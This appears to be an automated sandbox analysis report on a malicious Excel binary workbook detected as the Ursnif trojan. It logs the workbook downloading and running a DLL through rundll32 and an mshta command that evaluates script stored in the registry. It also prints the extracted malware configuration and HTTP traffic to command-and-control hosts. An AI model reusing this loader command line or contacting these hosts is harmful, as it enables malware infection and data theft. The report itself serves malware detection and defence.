Play interactive tour

Edit tour

Analysis Report File_78476.xlsb

Overview

General Information

Sample Name:	File_78476.xlsb
Analysis ID:	352546
MD5:	77927a0a05cc284ca6e904563cf81f20
SHA1:	0ffd8f1b079a75f143cd601d832e1a5e2f651818
SHA256:	d46861839e12139c03aceef7f735426d794809344f18d8b2053377dcb1ebd470
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for domain / URL

Yara detected Ursnif

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Writes registry values via WMI

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the installation date of Windows

Searches for the Microsoft Outlook file path

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 6696 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

rundll32.exe (PID: 7104 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 2288 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6024 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5748 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6336 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 5428 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "226", "system": "53111af62e035434ff52895482ef7b78hhw", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613184313", "user": "f73be0088695dc15e71ab15c2aa7c3e0", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 7104	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6696, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer, ProcessId: 7104

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: rundll32.exe.7104.1.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "226", "system": "53111af62e035434ff52895482ef7b78hhw", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613184313", "user": "f73be0088695dc15e71ab15c2aa7c3e0", "hash": "0xf857f57e", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 8%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 10%	Perma Link

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 162.241.169.26:443 -> 192.168.2.3:49731 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\Campenergy\wouldShoulder\learnable\motion.pdb source: 11[1].dll.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\ProgramData\fsh\87.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: 11[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe

Jump to behavior

Networking:

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View

ASN Name: GOOGLEUS GOOGLEUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.191.228

Source: global traffic	HTTP traffic detected: GET /campo/m/m HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 139.162.191.228Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/NHDZE5NC0p4/EA1Rau0QpdKGS3/WTlj_2B7vKVxuNa_2F_2B/LYVSumGe5smX_2BD/OTX07ZqQ_2BIY5i/gaJx2nrBRbCwokKD6i/TmP3yOyRd/UIWhx47302AAtFE31oP0/QH6kOp10Kt5yvTIaAYa/LK0GUog4M1OCTVMD4H5Cd4/y7Hidc3RQ475o/Nxk1_2FU/AOpYSuCaFqv8yJoz1d98uE0/RGNbcUJDfT/THwRpNZtVSPwcxLQu/JgOmTTbGBEY6/RAYX3HI935J/bkHevlKXRebACN/zYCEHnvaIKYWA35nI5OI7/Zng6uRiwb/9FNesaJS HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/FnFXZRWsgaOv/P6JvZtKT1UO/agHdP9HeJ299dx/NjFG3Ft3KB32OuetXL2sT/DABW2CvkhTj1mHcu/d2rOfCnZM39ngVM/pgEkPfy7WZBHt2_2BI/8hIbLV9eh/Nxh_2BSaIH1v25_2Fy2g/jQtR51J9UQmW5hGZQSs/bUByYCCGCjlzccS8n_2Fr1/2TxpWMxaih6Zd/1FC2e6YZ/ytawmZHSR4fCdrk_2BuzGs2/I_2Fe7DGRd/nrzf8JbWsmL4ZMLw8/AiFgBOzN747U/qJ5myKX5wF4/23oTR339hxhZPv/OxZ3q5cF_2BQi5HeJCCQ3/czqNoTGtPyg5zMIR/bO5RZf4FOlJ/J HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0dYaBh2VTFZ3ie/AQvPNAeKAbUpEx_2BIA_2F/yqBcCuGKcxWU4/7_2FDUSL/tmEKyuvK3UnsOb7GxJhyB1v/eAgP5jhU7c/4LQdBuTq0iBob66eg/RKZ75u7U2Jkq/Bh_2B1mS8Vw/lDNXKg1S3Gc5QV/zwawyAQoh3ycAGCJJd6YY/crMtievOTWbq6IjA/LAnATbCyag_2Bwn/5yU0_2BoSAkzUKbcl_/2BAXWx8K4/WLBZv2PnGv5crOgJCyib/ZVr6kC0SezCKLbzs2jt/2ZOSFMw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/TsKcWE2WM/nJKmvtwztxYIvooVmlF8/f0GhZMHg0Zw5qyafREH/k8WCOuLk57UyBPUazjQh2Z/3S3ubdSMDgVaL/gAWRJwIA/ZCG7BHExQwWXeVA1UnuSBqn/i4n1PFTtlL/cwWi1gc5A_2Bt5DHa/KB0_2BLRegs0/BViXJpKwWgb/pjm_2BuXWxLo81/vWKBV9Fs7FvCc1nuX8q5n/wGeJRl_2FEvkYbfF/Pr91DmkaDab5rrv/0H_2FXSeTsgpPadA5E/E3CpLlb73/0qgYAbyOZODf4FqqEkA4/X5b8p4TRxQsXlnMDNwZ/TvAO43omBsbN/h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at

Source: unknown

DNS traffic detected: queries for: cabogrupo.co.mz

Source: unknown

HTTP traffic detected: POST /api1/pmT_2FJ7yMpV_2FsxCGV/80ZJDlvhk5QH3DonF9p/gMZiDS0z2g2bNrJ_2Bv_2B/DXZEEWDxEnN_2/Bx7WHkRW/wpcaGRddIyctm9GWW0oCdyR/qDXQAt7J40/6ogNDJFenwl5gVncd/SbRM7SEjzx1B/lGa_2BU69FH/bDmPVUZABXfNqj/99lThSa0HHLaHhjsVvXGB/uCBX4Mj6I29IAbCC/UnujtjeNBz5OBuo/7XOr98uUHKNs6Ghu4C/k_2BIsFhF/UXse0hUo2oKU8zO8khsV/ZbPtcIIUg_2B2PD2b0Q/KHYH7l2X48hEAXFhsSFudS/huoP4e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Feb 2021 17:45:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: sheet9.bin	String found in binary or memory: http://139.162.191.228/campo/m/m.D
Source: {7B42C275-6DA5-11EB-90E4-ECF4BB862DED}.dat.22.dr, ~DF045C60B1D61D61DD.TMP.22.dr	String found in binary or memory: http://api10.laptok.at/api1/FnFXZRWsgaOv/P6JvZtKT1UO/agHdP9HeJ299dx/NjFG3Ft3KB32OuetXL2sT/DABW2CvkhT
Source: ~DF78E812B899E938EF.TMP.22.dr, {7B42C273-6DA5-11EB-90E4-ECF4BB862DED}.dat.22.dr	String found in binary or memory: http://api10.laptok.at/api1/NHDZE5NC0p4/EA1Rau0QpdKGS3/WTlj_2B7vKVxuNa_2F_2B/LYVSumGe5smX_2BD/OTX07Z
Source: {7B42C277-6DA5-11EB-90E4-ECF4BB862DED}.dat.22.dr	String found in binary or memory: http://api10.laptok.at/api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.office.net
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://augloop.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://cdn.entity.
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://cortana.ai
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://cr.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://directory.services.
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://graph.windows.net
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://login.windows.local
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://management.azure.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://management.azure.com/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
